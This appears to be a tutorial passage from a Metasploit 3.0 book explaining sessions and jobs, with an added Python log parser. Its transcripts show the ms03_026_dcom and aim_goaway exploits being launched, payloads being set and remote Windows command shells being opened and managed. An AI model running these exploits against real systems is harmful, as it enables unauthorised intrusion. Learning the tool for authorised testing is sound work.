New in Metasploit 3.0 are the concepts of sessions and jobs. In prior releases, interactive shells or other tasks would take control of the terminal, preventing other interaction with Metasploit until the task completed. Now, interactive shells and other payloads are wrapped in sessions that can be suspended and resumed. Similarly, exploits that require running a server, such as browser exploits that rely on tricking a user into connecting to Metasploit's web server, are managed as jobs that run in the background. By using sessions and jobs, you can now perform multiple exploits at once in a single Metasploit instance.
Sessions are automatically created for you when you use interactive payloads such as the shell or Meterpreter payloads (see The Meterpreter). When a session is created, the session ID is printed as part of the exploit output:
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:yakima[135]
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:yakima[135] ...
[*] Sending exploit ...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (10.150.9.46:59996 -> 10.157.6.231:4444)
[*] The DCERPC service did not reply to our request
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
The newly created session is immediately active, and your keyboard input is passed directly to the session. If you want to continue using Metasploit but don't want to close the session, you can type ^Z (Ctrl-Z) to put the session in the "background." This returns you to the Metasploit console but leaves the session running:
C:\WINDOWS\system32>cd c:\
cd c:\
C:\>^Z
Background session 1? [y/N] y
msf exploit(ms03_026_dcom) >
Now that you're back at the Metasploit prompt, you're free to continue to use Metasploit to exploit additional machines and even create new sessions:
msf exploit(ms03_026_dcom) > set RHOST snake
RHOST => 10.157.6.140
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp: ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp: ...
[*] Sending exploit ...
[*] Sending stage (474 bytes)
[*] The DCERPC service did not reply to our request
[*] Command shell session 2 opened (10.150.9.46:60054 -> 10.157.6.140:4444)
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>^Z
Background session 2? [y/N] y
msf exploit(ms03_026_dcom) >
You can get a list of active sessions by typing sessions -l. The listing tells you which payload is active, as well as the IP addresses and ports involved. Here you can see the two sessions we created and put into the background:
msf exploit(ms03_026_dcom) > sessions -l
Active sessions
===============
Id  Description    Tunnel
--  -----------    ------
1   Command shell  10.150.9.46:59996 -> 10.157.6.231:4444
2   Command shell  10.150.9.46:60054 -> 10.157.6.140:4444
You can resume a session where you left off by typing sessions -i sessionid:
msf exploit(ms03_026_dcom) > sessions -i 2
[*] Starting interaction with 2...
C:\WINNT\system32>exit
exit
^C
Abort session 2? [y/N] y
As you can see in this example, sometimes shells don't exit cleanly and fail to return you to the Metasploit prompt. If you ever need to terminate a session, as in the preceding case, you can type ^C (Ctrl-C) to abort the session.
Jobs are similar to sessions, but are created by any tasks that need to run in the background. Exploits that run servers that wait for client connections are one example of job creation. The code that follows offers an example of a job being created when we run a browser exploit.
msf > use exploit/windows/browser/aim_goaway
msf exploit(aim_goaway) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(aim_goaway) > exploit
[*] Using URL: http://192.168.10.10:8080/HKkUJ441
[*] Server started.
[*] Exploit running as background job.
Active jobs can be listed by typing jobs -l from the command prompt. A list of jobs is displayed along with a job ID. Job IDs can be used with the -k flag to terminate running jobs. Here is an example of listing jobs, then killing one using the job ID:
msf exploit(aim_goaway) > jobs -l
Jobs
====
Id  Name
--  ----
0   Exploit: windows/browser/aim_goaway
msf exploit(aim_goaway) > jobs -k 0
Stopping job: 0...
msf exploit(aim_goaway) > jobs -l
Jobs
====
No active jobs.
The special flag -K is provided if you want to kill all running jobs simultaneously.
Any output from the background job will be printed to the console. If the job is an exploit that manages to successfully compromise a client, a session will be created and automatically placed in the background. The session can be listed and resumed using the commands detailed in the earlier section "Sessions." Here's an example of a job spawning a session:
msf exploit(aim_goaway) >
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:50018)
msf exploit(aim_goaway) > sessions -l
Active sessions
===============
Id  Description    Tunnel
--  -----------    ------
1   Command shell  127.0.0.1:4444 -> 127.0.0.1:50018
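As an added example (not from the book and not part of Metasploit), here is a Python parser for the session-opened notices and the sessions -l and jobs -l tables shown in this section, which is useful when reviewing a saved console log to reconcile which announced sessions are still listed. The console text it reads is constructed from the transcripts on this page; session 3 is an invented entry that was announced but has since disappeared from the listing, as happens after ^C aborts a session.

```python
import re

# Constructed msfconsole output, modelled on the transcripts on this page;
# session 3 is announced but missing from the listing (e.g. aborted with ^C).
SAMPLE = """\
[*] Command shell session 1 opened (10.150.9.46:59996 -> 10.157.6.231:4444)
[*] Command shell session 2 opened (10.150.9.46:60054 -> 10.157.6.140:4444)
[*] Meterpreter session 3 opened (10.150.9.46:4444 -> 10.157.6.150:1052)
[*] Exploit running as background job.
Active sessions
===============
  Id  Description    Tunnel
  --  -----------    ------
  1   Command shell  10.150.9.46:59996 -> 10.157.6.231:4444
  2   Command shell  10.150.9.46:60054 -> 10.157.6.140:4444
Jobs
====
  Id  Name
  --  ----
  0   Exploit: windows/browser/aim_goaway
"""

# "[*] <payload type> session <id> opened (<local> -> <peer>)"
OPENED = re.compile(r"\[\*\] (?P<desc>.+?) session (?P<id>\d+) opened "
                    r"\((?P<src>[\d.]+:\d+) -> (?P<dst>[\d.]+:\d+)\)")
# Rows of the "sessions -l" / "jobs -l" tables; header and dash lines never match.
SESSION_ROW = re.compile(r"^\s*(?P<id>\d+)\s+(?P<desc>.+?)\s+(?P<src>\S+) -> (?P<dst>\S+)\s*$")
JOB_ROW = re.compile(r"^\s*(?P<id>\d+)\s+(?P<name>\S.*?)\s*$")


def parse_console(text):
    """Collect session-opened notices plus the session and job tables."""
    out = {"opened": [], "sessions": [], "jobs": []}
    section = None  # table we are currently inside, if any
    for line in text.splitlines():
        m = OPENED.search(line)
        if m:
            out["opened"].append(m.groupdict())
            continue
        if line.startswith("Active sessions"):
            section = "sessions"
        elif line.startswith("Jobs"):
            section = "jobs"
        elif section == "sessions" and (m := SESSION_ROW.match(line)):
            out["sessions"].append(m.groupdict())
        elif section == "jobs" and (m := JOB_ROW.match(line)):
            out["jobs"].append(m.groupdict())
    return out


def vanished_sessions(parsed):
    """Ids announced as opened that no longer appear in the listing."""
    listed = {s["id"] for s in parsed["sessions"]}
    return sorted(int(o["id"]) for o in parsed["opened"] if o["id"] not in listed)
```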